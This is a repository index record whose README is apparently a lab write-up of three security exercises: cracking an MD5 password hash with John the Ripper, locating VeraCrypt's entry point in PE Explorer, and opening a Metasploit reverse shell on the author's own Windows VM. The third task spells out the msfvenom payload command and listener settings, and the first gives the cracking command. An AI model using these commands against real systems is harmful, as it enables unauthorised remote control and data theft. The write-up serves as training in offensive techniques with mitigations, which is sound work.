{"id":29523916,"url":"https://github.com/codelassey/intermediate-level","last_synced_at":"2026-05-19T06:05:00.520Z","repository":{"id":304421021,"uuid":"1018745315","full_name":"codelassey/intermediate-level","owner":"codelassey","description":"Focused on cybersecurity techniques, including cracking a hashed password to unlock a VeraCrypt-encrypted file, analyzing an executable to find its entry point, and creating a reverse shell payload using Metasploit.","archived":false,"fork":false,"pushed_at":"2025-07-13T00:39:52.000Z","size":2537,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-07-13T02:34:20.816Z","etag":null,"topics":["john-the-ripper","linux","medusa","metasploit-framework","msfvenom","reverse-engineering","veracrypt","windows"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/codelassey.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-07-13T00:15:34.000Z","updated_at":"2025-07-13T00:41:17.000Z","dependencies_parsed_at":"2025-07-13T02:44:47.341Z","dependency_job_id":null,"html_url":"https://github.com/codelassey/intermediate-level","commit_stats":null,"previous_names":["codelassey/intermediate-level"],"tags_count":null,"template":false,"template_full_name":null,"purl":"pkg:github/codelassey/intermediate-level","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/codelassey%2Fintermediate-level","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repo
sitories/codelassey%2Fintermediate-level/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/codelassey%2Fintermediate-level/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/codelassey%2Fintermediate-level/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/codelassey","download_url":"https://codeload.github.com/codelassey/intermediate-level/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/codelassey%2Fintermediate-level/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":33204085,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-18T09:27:30.708Z","status":"online","status_checked_at":"2026-05-19T02:00:06.763Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["john-the-ripper","linux","medusa","metasploit-framework","msfvenom","reverse-engineering","veracrypt","windows"],"created_at":"2025-07-16T18:08:56.433Z","updated_at":"2026-05-19T06:05:00.504Z","avatar_url":"https://github.com/codelassey.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Introduction\n\nThe intermediate level tasks focused on advanced cybersecurity\ntechniques, including cracking a hashed password to unlock a\nVeraCrypt-encrypted file, analyzing an executable to find its entry\npoint, and creating a reverse shell 
payload using Metasploit. These\ntasks were performed using a Kali Linux machine and Windows 10 on a\nhost-only network, with additional tools like John the Ripper, PE\nExplorer, and Metasploit.\n\n# Task Level: Intermediate\n\n| **S.NO** | **TITLE**                                                                                                                                                                     |\n|----------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\n| 1        | A file is encrypted using VeraCrypt (a disk encryption tool). The password to access the file is encrypted in a hash format and provided to you in the drive with the name `encoded.txt`. Decode the password and enter it in VeraCrypt to unlock the file and find the secret code in it. The VeraCrypt setup file will be provided to you. |\n| 2        | An executable file of VeraCrypt will be provided to you. Find the address of the entry point of the executable using the PE Explorer tool and provide the value as the answer in a screenshot. |\n| 3        | Create a payload using Metasploit and make a reverse shell connection from a Windows 10 machine in your virtual machine setup.                                               |\n\n# Information About The Report\n\n-   **Password Hash Cracking**: This technique involves recovering\n    plaintext passwords from hashed formats using brute force or\n    wordlist attacks. In Task 1, I cracked a password hash to unlock a\n    VeraCrypt file, revealing the secret code.\n\n-   **Executable File Analysis**: This process uses reverse engineering\n    tools to inspect executable files for key attributes like the entry\n    point. 
In Task 2, I analyzed the VeraCrypt executable to find its\n    entry point using PE Explorer.\n\n-   **Reverse Shell Creation**: This method establishes a remote\n    connection from a target to an attacker's machine, allowing command\n    execution. In Task 3, I created a Metasploit payload to gain a\n    reverse shell from my Windows host, enabling directory navigation\n    and file transfer.\n\n# Task 1: Decode the Password for the VeraCrypt-Encrypted File\n\n**Attack Name**: Password Hash Cracking\n\n**Severity**: High\n\n**Reason**: Cracking a hashed password can grant unauthorized access to\nencrypted files, potentially exposing sensitive data, making it a\ncritical security threat.\n\n**Steps Taken**\n\n1.  Located the file `encoded.txt` on the provided drive, containing the hash 482c811da5d5b4bc6d497ffa98491e38.\n\n2.  Identified the hash type as MD5 using its 32-character hexadecimal format.\n\n3.  Used John the Ripper to crack the hash with the command: `john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt encoded.txt`\n\n5.  John returned the cracked password: **password123**.\n\n6.  Opened VeraCrypt, mounted the encrypted file, and entered password123 to unlock it.\n\n\u003e ![SHOTS](SHOTS/media/image9.png)\n\n\u003e ![SHOTS](SHOTS/media/image10.png)\n\n\n7.  Accessed the file's content and saw the secret code: **never giveup**.\n\n\u003e ![SHOT](SHOTS/media/image11.png)\n\n\n**Analysis**\n\n-   The hash was successfully cracked. 
MD5 is a weak hashing algorithm vulnerable to wordlist attacks.\n\n-   The password 'password123' was found in the rockyou.txt wordlist, indicating a weak password choice.\n\n-   The secret code never giveup was retrieved, demonstrating the risk of weak passwords in encryption.\n\n**Impact**\n\n-   Unauthorized access to encrypted files can lead to data breaches,\n    exposing sensitive information.\n\n-   Weak passwords and outdated hash algorithms increase the risk of\n    successful attacks.\n\n**Mitigation**\n\n-   Use strong, complex passphrases with mixed case, numbers, and\n    symbols.\n\n-   Employ stronger hash algorithms like bcrypt and Argon2 for password\n    storage.\n\n-   Regularly audit and update encryption tools and passwords.\n\n**Tools Used**\n\n-   John the Ripper\n\n-   VeraCrypt\n\n# Task 2: Find the Address of the Entry Point of the VeraCrypt Executable\n\n**Attack Name**: Executable File Analysis\n\n**Severity**: Medium\n\n**Reason**: Identifying the entry point of an executable can aid in\nreverse engineering or exploit development, posing a moderate risk if\nused maliciously to analyze or modify software behavior.\n\n**Steps Taken**\n\n1.  Obtained the VeraCrypt executable file.\n\n2.  Launched PE Explorer on my Windows 10 system.\n\n\u003e ![shot](SHOTS/media/image12.png)\n\n3.  Opened VeraCrypt.exe in PE Explorer via File \\\u003e Open.\n\n\u003e ![shot](SHOTS/media/image13.png)\n\n4.  Navigated to the Headers Info Viewer and located the Optional Header\n    section.\n\n5.  
Identified the Address of Entry Point, recorded as 004237B0.\n\n\u003e ![shots](SHOTS/media/image14.png)\n\n**Analysis**\n\n-   The Address of Entry Point (004237B0) is a Relative Virtual Address\n    (RVA), indicating where the executable's code begins in memory.\n\n-   This information could be used to analyze the program's behavior or\n    develop exploits, though no malicious actions were performed here.\n\n**Impact**\n\n-   Knowledge of the entry point can facilitate reverse engineering,\n    potentially leading to vulnerabilities if the executable has flaws.\n\n-   Unauthorized modification of the executable could compromise system\n    security.\n\n**Mitigation**\n\n-   Obfuscate executable code to hinder reverse engineering.\n\n-   Use code signing to verify the integrity of executables.\n\n-   Restrict access to sensitive executables and monitor for\n    unauthorized analysis.\n\n**Tools Used**\n\n-   PE Explorer\n\n---\n\n# Task 3: Create a Metasploit Payload and Establish a Reverse Shell\n\n**Attack Name**: Reverse Shell Exploitation\n\n**Severity**: Critical\n\n**Reason**: A reverse shell grants full control over a target system,\nenabling file access, command execution, and potential privilege\nescalation, posing a severe threat if exploited maliciously.\n\n**Steps Taken**\n\n1.  On my Kali Linux machine (IP: 192.168.56.109), I ran: `msfvenom -p\n    windows/meterpreter/reverse_tcp LHOST=192.168.56.109 LPORT=4444 -f\n    exe -o bad.exe` to create a reverse shell payload.\n\n\u003e ![shot](SHOTS/media/image15.png)\n\n2.  On my Kali VM, I dropped bad.exe to the E: drive (E:\\\\PAYLOAD) on the Windows 10 machine using a shared folder.\n\n3.  In Kali, started Metasploit (msfconsole) and set up the listener:\n- `use exploit/multi/handler`\n- `set PAYLOAD windows/meterpreter/reverse_tcp`\n- `set LHOST 192.168.56.109`\n- `set LPORT 4444`\n- `exploit`\n\n\u003e ![shot](SHOTS/media/image16.png)\n\n4.  
On the Windows host, double-clicked bad.exe on the E: drive to\n    execute it.\n\n5.  Gained a Meterpreter session and ran commands:\n\n-   `sysinfo` to confirm system details.\n\n-   `getuid` to verify myself hahaha...\n\n-   `ps` to list running processes on my Windows 10.\n\n-   `cd C:\\\\` and `dir` to navigate and view directories like Users.\n\n-   I downloaded a file from the Windows machine onto the Kali VM.\n\n\u003e ![shot](SHOTS/media/image17.png)\n\n\u003e ![shot](SHOTS/media/image18.png)\n\n\u003e ![shot](SHOTS/media/image19.png)\n\n\u003e ![shot](SHOTS/media/image20.png)\n\n\u003e ![shot](SHOTS/media/image21.png)\n\n\u003e ![shot](SHOTS/media/image22.png)\n\n\u003e ![shot](SHOTS/media/image23.png)\n\n\u003e ![shot](SHOTS/media/image24.png)\n\n6.  Terminated the session with `kill` and `exit`, and deleted bad.exe\n    from E:\\\\Downloads.\n\n**Analysis**\n\n-   The reverse shell successfully connected to the Kali listener,\n    allowing full control over the Windows host.\n\n-   Navigation to the C: drive revealed standard directories, and file\n    download demonstrated the payload's capabilities.\n\n**Impact**\n\n-   A reverse shell can lead to complete system compromise, including\n    data theft, malware deployment, or privilege escalation.\n\n-   Unprotected systems are highly vulnerable to such attacks if\n    payloads are executed.\n\n**Mitigation**\n\n-   Enable and configure Windows Defender and Firewall to block\n    suspicious executables.\n\n-   Restrict user permissions to prevent unauthorized execution.\n\n-   Avoid running untrusted files and use sandbox environments for\n    testing.\n\n**Tools Used**\n\n-   Metasploit Framework\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcodelassey%2Fintermediate-level","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcodelassey%2Fintermediate-level","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcodelassey%2Fintermediate-level/lists"}